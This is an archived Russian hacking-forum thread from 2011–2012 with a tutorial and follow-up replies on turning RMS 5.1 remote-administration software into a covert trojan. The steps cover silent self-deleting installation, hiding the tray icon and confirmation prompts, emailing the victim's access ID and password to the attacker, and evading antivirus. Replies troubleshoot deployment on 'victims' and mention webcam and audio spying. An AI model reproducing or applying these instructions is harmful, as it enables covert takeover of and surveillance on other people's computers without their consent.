1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.
    Скрыть объявление

RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи на хакерскую тематику", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. крах

    крах Новичок

    Регистрация:
    25 дек 2010
    Сообщения:
    0
    Симпатии:
    1
    Баллы:
    0
    Доброго времени суток

    Сегодня я бы хотел разобрать с вами новую версию RMS 5.1 (скрытая установка)

    Изначально я собирал ее для себя и не хотел создавать эту тему,но решил поучаствовать в "конкурсе на лучшую статью".http://www.xaker.name/forvb/showthread.php?t=22866. Как говорится решил попытать удачу :)

    В отличии от предыдущей темы http://www.xaker.name/forvb/showthread.php?p=156764#post156764 вам не придется возится с кучей файлов,нет ничего сложного.Даже новичок сможет собрать ее не напригая мозги :)

    И так

    Что собой представляет сборка:
    1. Полностью скрытая установка.
    2. После запуска установщик самоудаляется.
    3. Теперь ID отправляется на вашу почту.
    4. Не палится антивирусами.
    5. Сервер можно удалить с самого клиента удаленно.

    Изначально для этого нам понадобятся 4 файла:
    1. rms.viewer5.1b1ru (клиент RMS)
    2. rms.server5.1b1ru (сервер RMS)
    3. setup.exe (само удаляющийся архив)
    4. install.bat

    Все файлы можно скачать одним архивом:http://www.multiupload.com/QZYBW3LGGV (Парни сори кому не ответил в личку...У меня этих файлов давно уже нет)

    И так приступим к сборке:
    Устанавливаем и запускаем rms.viewer5.1b1ru (клиент RMS),

    1.Удаленная установка - MSI Конфигуратор...

    [​IMG]

    Далее конфигурируем следующие настройки:

    1. Укажите путь к вашему MSI пакету сервера rms.server5.1b1ru
    2. Выбираем тип дистрибутива One-Clik. Единый exe файл...
    3. Вбиваем адрес своего почтового ящика,на который будет приходить ID и pass.(приходит на mail.ru)
    4. Нажимаем Конфигурировать

    [​IMG]

    Выйдет окошко настройка сервера

    [​IMG]

    Там выбираем Настройки ,в окне ставим галочку только на: Скрывать в меню "Остановить RMS-сервер"

    [​IMG]

    Так же в настройках выбираем :"Лицензионный ключ" копируем туда вот этот ключ (имеется в скаченном архиве):
    Ок-нажимаем выход.

    Сохраняем файл RMS.exe и открываем его архиватором 7z - Открыть архив.Достаем оттуда install.cmd

    [​IMG]

    Далее открываем install.cmd блокнотом и меняем следующие параметры:
    /passive REBOOT=ReallySuppress меняем на /qn REBOOT=ReallySuppress (теперь при установке окно не моргает).

    [​IMG]

    вот готовый install.cmd

    Далее вставьте install.cmd обратно.Сам сервер у нас уже готов,теперь нам его нужно положить в само удаляющийся архив setup.exe/

    Нам также пондобится install.bat (4-ый файл в скаченном архиве)

    Вот как выглядит install.bat:
    Открываем setup.exe также архиватором 7z,перетаскиваем туда наш RMS.exe и готовый файл install.bat.

    [​IMG]

    На этом все сборка готова,пользуйтесь на здоровье :)

    Данная сборка на сегодняшний день не палится антивирусами,просьба не лить на вирустотал...

    Не буду описывать все преимущества RMS и ее минусы так как это все есть в соседнем посте.Тестил несколько раз(XP,7),все работает.Если будут вопросы обращайтесь...

    // копирование на другие ресурсы разрешено только с копирайтом и ссылкой на этот топик

    Сборка предоставляется исключительно для ознакомления.
    Использование данной сборки влечет за собой ответственность согласно действующему законодательству.


    (c) krah
    Для конкурса статей.
     
    Последнее редактирование: 18 ноя 2012
    7 пользователям это понравилось.
  2. lisabon_Q3

    lisabon_Q3 Новичок

    Регистрация:
    14 сен 2011
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    такая же фигня, в чем подвох?

    [​IMG]


    эмм понял )), надо поставить две первые галочки на вкладке Другое
    [​IMG]
    лучше добавить в 1 пост..
     
    Последнее редактирование: 15 сен 2011
  3. hacker_den

    hacker_den Guest

    Ничего не получилось, вылазит и всё!

    ПОМОГИТЕ!!!


    //
    продолжите игнорировать замечания о выделяли сообщения жирным шрифтом - будет бан на неопределенный срок.
    // Хулиган
     
    Последнее редактирование модератором: 15 сен 2011
  4. Champion

    Champion Новичок

    Регистрация:
    16 сен 2011
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    кстати да... как убрать иконку с трея ,и убрать - [​IMG] перед запуском у жертвы?
     
  5. крах

    крах Новичок

    Регистрация:
    25 дек 2010
    Сообщения:
    0
    Симпатии:
    1
    Баллы:
    0
    Будьте внимательнее :

    Чтобы убрать иконку из трея нужно снять галочку на "Показывать иконку в системном трее"

    [​IMG]

    Чтобы Не запрашивалось подтверждение нужно поставить галочку на "Не запрашивать подтверждения"
     
    Последнее редактирование модератором: 7 янв 2017
  6. FREENG

    FREENG Новичок

    Регистрация:
    19 авг 2011
    Сообщения:
    0
    Симпатии:
    4
    Баллы:
    0
  7. Jlok

    Jlok Новичок

    Регистрация:
    4 дек 2011
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Вылетает программа, а иногда *эта ошибка, когда настроил конфигурации и нажимаю выход.
    [​IMG]
     
    Последнее редактирование: 4 дек 2011
  8. vlader

    vlader Guest

    Кстати насчёт .js файла, я придумал, что можно сделать. Создаём sfx архив и заносим туда все файлы, которые мы заносили в setup.exe. А теперь самое важное. В настройках sfx при архивации туда, куда надо написать файл, который откроется после архивации пишем
    Код:
    %windir%\system32\wscript.exe stop.js /b /nologo
    Вот и всё. Данный метод подойдёт также и к сборке из соседней темы.
    А для тех, кто ничего не понял, я сделал скрины.
    [​IMG]
    [​IMG][​IMG]
    После этого надо создать архив. В архиве должны быть все файлы, которые были в setup.exe.
     
  9. Kostan_PROFF

    Kostan_PROFF Новичок

    Регистрация:
    11 янв 2010
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Как убрать эту табличку
    [​IMG]

    Этот пункт не активен

    [​IMG]

    на сколько я понял это в последней версии рмс 5.1, а в бетах ещё можно поставить эту галочку.
    пожалуйста дайте ссылку на бета версию, где этот пункт активен.
     
  10. TDI

    TDI Новичок

    Регистрация:
    23 май 2011
    Сообщения:
    0
    Симпатии:
    28
    Баллы:
    0
    с офф скачай
     
  11. IceBolt

    IceBolt Новичок

    Регистрация:
    18 окт 2010
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Воюю с версией 5.1,собираю по этому мануалу.Категорически не хотят прятаться окна с предупреждением и о завершении установки.
    В меню не активен пункт "не запрашивать подтверждение,как видно из скрина-
    [​IMG]
    Версию 5.0 юзал хорошо.
    Приходится снова переходить на RMS ввиду закрытых портов и невозможности теперь юзать раты типа XtremeRat и DarkComet
     
    Последнее редактирование: 8 янв 2012
  12. Reymon

    Reymon Новичок

    Регистрация:
    11 янв 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Последнее редактирование: 13 янв 2012
  13. TricksteR13

    TricksteR13 Новичок

    Регистрация:
    13 янв 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    А после какой именно строки это писать? Не ругайте только, я знаю, что я нуб..

    Добавлено через 2 минуты
    а для той версии, что в первом посте подойдет?
     
    Последнее редактирование: 13 янв 2012
  14. IceBolt

    IceBolt Новичок

    Регистрация:
    18 окт 2010
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Со старой 5.0 сборкой стало много косяков из за патча,хотя он не принципиально нужный,просто хотелось добиться удаления баннера.Патченные как писал выше баннер убирали,но работал только звук,а видео не захватывало.
    Перешёл на версию 5.1beta3-оказывается гораздо удобнее.Только один сервер и можно его впаривать нескольким машинам,ID и пасс новые на почту приходят.Пропатчиваются в установленном состоянии уже,удалённо легко и быстро заменой 2х файликов,после чего отлично работаею вебка вместе со звуком без баннера,конечно диод только выдаёт-))
    А вот только сегодня прочекал составные части сборки на вирусчекере.Отдельно,потому что архивы(чем является сборка)в халявной версии чекера не принимают))
    [​IMG]
    [​IMG]
    [​IMG]
    [​IMG]
     
  15. НубоХакер

    НубоХакер Новичок

    Регистрация:
    23 фев 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    [​IMG]
    как от этого избавиться?
    мой скайп vadim_xaker
     
  16. WELDERX

    WELDERX Новичок

    Регистрация:
    26 фев 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    У "жертвы" если не запускается то зайди в панель управления и включи его.
    ------------------------------------------------------------------------------
    [​IMG]
    -----------------------------------------------------------------------
    Но даже если стоит ( у того кому ты хочешь его загнать ) мало мальский антивирус или Anti Auto Run то не факт что сработает.
    -----------------------------
    По поводу пробуждения... Включения удалённо не как !!!. Только предварительно "загнав" троянчика или установив программу которая может это проделать. Названия не помню... Погугли
     
    Последнее редактирование: 28 фев 2012
  17. WELDERX

    WELDERX Новичок

    Регистрация:
    26 фев 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Добавлено через 14 минут
     
    Последнее редактирование: 29 фев 2012
  18. WELDERX

    WELDERX Новичок

    Регистрация:
    26 фев 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Как это не поддерживает ???
    -----------------------------------
    -----------------------------------
    [​IMG]
    ------------------------------------------
    ------------------------------------------
    [​IMG]
     
  19. krtop

    krtop Новичок

    Регистрация:
    13 мар 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    В чем проблема? win7 стоит, для клиента выставила права админа, запустил через администратора и каждый раз выходит это после нажатия "Конфигурировать":
    [​IMG]

    и, кстати, почему заблокирована кнопка "Не запрашивать подтверждения"?
    помогите :)
     
  20. vlader

    vlader Guest

    chesterrash, ты закрываешь окно кофигурации сервера.
    [​IMG]
    Перед тем как появится это окошко,
    [​IMG]
    ты должен завершить процесс вьювера.
    [​IMG]
    Затем заходишь в папку %temp%, находишь папку с названием похожим на
    [​IMG]
    В этой папке открываешь файл config.txt, удаляешь строчку
    сохраняешь файл, запускаешь make_installer.cmd. Готово! Твой файл -- это rms.exe
    [​IMG]
     
    1 человеку нравится это.
Статус темы:
Закрыта.

Поделиться этой страницей